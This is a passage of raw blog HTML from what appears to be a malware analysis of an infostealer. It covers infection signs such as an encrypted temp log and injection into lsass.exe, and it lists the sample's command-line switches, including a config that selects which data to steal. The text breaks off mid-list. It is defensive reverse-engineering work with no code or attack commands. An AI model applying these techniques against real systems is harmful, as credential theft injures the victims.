href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Simply running the malware produces nothing. It is because this infostealer needs to be supplied with the string “xxx” as argument; e.g. “9749d38ae9b9ddd81b50aad679ee87ec.exe xxx”. It also accepts other arguments as well which will be discussed further in the detailed analysis part.</span></span><br />
<span style="color: #010101; font-family: Calibri; text-align: -webkit-auto; text-indent: 13mm;"><span style="font-size: 11pt;">Supplying the string “xxx” we can see that; by default, it creates a bzip2 encrypted file in %TEMP% folder as ~DQxx.tmp (where xx can be any random hex number) and is being used by lsass.exe as seen in Figure 4a.</span></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjutRJ5o4TGOJZZwJmjGNalB6qvyfrtHriFx1JCctO2nw39DKj4INyonOY_RqPhZb_u5eiU40k4ghp22PpX3BPQEoSoum_FoPvkEl0Q2MnY0ezyX-eHxk0G-L-_Xhkfk4NrXRBVrG0c/s1600/process.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 13mm;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjutRJ5o4TGOJZZwJmjGNalB6qvyfrtHriFx1JCctO2nw39DKj4INyonOY_RqPhZb_u5eiU40k4ghp22PpX3BPQEoSoum_FoPvkEl0Q2MnY0ezyX-eHxk0G-L-_Xhkfk4NrXRBVrG0c/s320/process.png" width="320" /></a></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><i style="color: #010101; font-family: Calibri; font-size: 11pt; text-indent: 0mm;">Figure 4a: A sign of infection, an encrypted log file ~DQ25.tmp is found in lsass.exe</i></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Another sign of infection is when a thread “sortxxxx.nls” is seen injected to lsass.exe.</span></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpp-zdosNbRm0SFDvEPjFMVVbA-TYeOqKNJMrbxx1ESmlFntue2xx7wSFXwOGMpQL1Acx8igLyQtJiI1x_Hw-WO5echFOn5LSvSKmUxwu15-iEb8wBmQNn1T_mAFHoMhly7rQrcn7A/s1600/sortxxx_thread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpp-zdosNbRm0SFDvEPjFMVVbA-TYeOqKNJMrbxx1ESmlFntue2xx7wSFXwOGMpQL1Acx8igLyQtJiI1x_Hw-WO5echFOn5LSvSKmUxwu15-iEb8wBmQNn1T_mAFHoMhly7rQrcn7A/s200/sortxxx_thread.png" width="176" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 4b: Another sign of infection, sort9760.nls thread is seen injected to lsass.exe</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ol start="6" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">DETAILED ANALYSIS</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>9749d38ae9b9ddd81b50aad679ee87ec – The Main Executable a.k.a “The Command Console”</i></b></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Since this malware is Microsoft Visual C++ compiled, the entry point located at 0x00403C91 is not the actual code start of the malware but instead we have to look for its WinMain entry which is readily available to IDA Pro. (Yay thanks IDA!)</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqIIuIjbaYJR6N1Si62F64X2uDri_patcU8sIkEhMsoFW0-HyBHjud6u0sACx_fcUtxawXLRZZ-biAKM47J7cLTwQg9G_qgcuhuHuKIEeK1xObWVm3gxB-LYyLiVB2fKYLmACUbIcY/s1600/call_winmain.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqIIuIjbaYJR6N1Si62F64X2uDri_patcU8sIkEhMsoFW0-HyBHjud6u0sACx_fcUtxawXLRZZ-biAKM47J7cLTwQg9G_qgcuhuHuKIEeK1xObWVm3gxB-LYyLiVB2fKYLmACUbIcY/s320/call_winmain.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 5: A Call to WinMain</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">This executable needs a specific command line argument in order for it to function. The usage is as follows:</span></span><br />
<span style="color: #010101; font-family: Calibri; font-size: 11pt; font-style: italic; font-weight: bold; text-align: -webkit-auto;"><br /></span>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; font-style: italic; font-weight: bold; text-align: -webkit-auto;">malware.exe xxx <optional parameters></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">By default, the executable spawns an lsass.exe process in which it injects a ~DQxx.tmp located in %TEMP% directory where “xx” can be any random hex number.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Other optional command line parameters are also available:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">/delme - deletes the executable.</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjI14hA2RLn8TdmFQcNcmxAmxRK_ahf0akmAk4NMzaT4SeLXaC-1kTdP8WBVdtHj6Sz9cCL5Ud31jB1OuTpmT9MqDzVV-F77199MsTJUnItgDZ54IkQwcVKM-YedD4jX2vhiwqRNTQ/s1600/delme_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjI14hA2RLn8TdmFQcNcmxAmxRK_ahf0akmAk4NMzaT4SeLXaC-1kTdP8WBVdtHj6Sz9cCL5Ud31jB1OuTpmT9MqDzVV-F77199MsTJUnItgDZ54IkQwcVKM-YedD4jX2vhiwqRNTQ/s320/delme_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6a: “delme” parameter</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">/v - verbose logging for its own debugging purposes, usage of printf() is visible here.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1PLUsdnlSiVPz6i3fbqOVaqr-S1hm2YP1zvmeSYQ3zh0-OM8SjfxRAWwcaJ-AxFbxw_wKMqsJBqnX17yCvqYuBkpwjNcI20baEVrVzPlQrenXx1DNvO7qMNoYOFF4tJN8F8Gbrom/s1600/v_param.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1PLUsdnlSiVPz6i3fbqOVaqr-S1hm2YP1zvmeSYQ3zh0-OM8SjfxRAWwcaJ-AxFbxw_wKMqsJBqnX17yCvqYuBkpwjNcI20baEVrVzPlQrenXx1DNvO7qMNoYOFF4tJN8F8Gbrom/s320/v_param.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6b: “v” parameter, verbose logging using printf() function.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<div style="font-family: Symbol;">
<span style="color: #010101; font-family: Calibri;">/quit - terminates the spawned process (default lsass.exe) with injected .tmp file.</span></div>
<span style="font-family: Calibri;"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTWEAio1SqWQqvV5LBVJK-7voOshwazx_gzNh2IxkllqpUWfi0_DDEKj85iLqh8h2yGJHISytGGcBhJKNLGZETWbu-25W8quB1djXCz5aAhkGwPyNOD1rOGiplW1StfAErHZGzkFS/s1600/quit_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTWEAio1SqWQqvV5LBVJK-7voOshwazx_gzNh2IxkllqpUWfi0_DDEKj85iLqh8h2yGJHISytGGcBhJKNLGZETWbu-25W8quB1djXCz5aAhkGwPyNOD1rOGiplW1StfAErHZGzkFS/s320/quit_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6c: “quit” parameter</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<div style="font-family: Symbol;">
<span style="color: #010101; font-family: Calibri;">/restart - restarts or spawns process (default lsass.exe) with injected .tmp file.</span></div>
<span style="font-family: Calibri;"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNWG4PfJanSXbwoASNy7NioohaUgEZBtEd7ghjCo80QWLDN7AFFa9oz3F_a1lVLuffjte-7VtqoLDV1h7qXzBy_rioqhLTWMSfM3yewyJUAQpXiT3QgtR_lsjygqEz9aEVFAjQw3zO/s1600/restart_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNWG4PfJanSXbwoASNy7NioohaUgEZBtEd7ghjCo80QWLDN7AFFa9oz3F_a1lVLuffjte-7VtqoLDV1h7qXzBy_rioqhLTWMSfM3yewyJUAQpXiT3QgtR_lsjygqEz9aEVFAjQw3zO/s320/restart_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6d: “restart” parameter</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">/in <config file> - config file used for issuing commands on what data to steal and recorded to its log file, default input is loaded from one of its resource if not specified.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzt5cI0Emq2Dk3ZwFithwJCi7M1TnKTQhF_BnxSXSwRa_4Bk3j4WyfhLRT9V1L_vSS41_bnl3GxY2n8OTd_DkNqtT-AKTTnBQ_J2IqJpnhZWNDKwkydCcMlJo0yLxT4e-TInks5CV/s1600/in_param.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzt5cI0Emq2Dk3ZwFithwJCi7M1TnKTQhF_BnxSXSwRa_4Bk3j4WyfhLRT9V1L_vSS41_bnl3GxY2n8OTd_DkNqtT-AKTTnBQ_J2IqJpnhZWNDKwkydCcMlJo0yLxT4e-TInks5CV/s320/in_param.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6e: “in” parameter, a part of its resource is loaded if /in is not specified.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
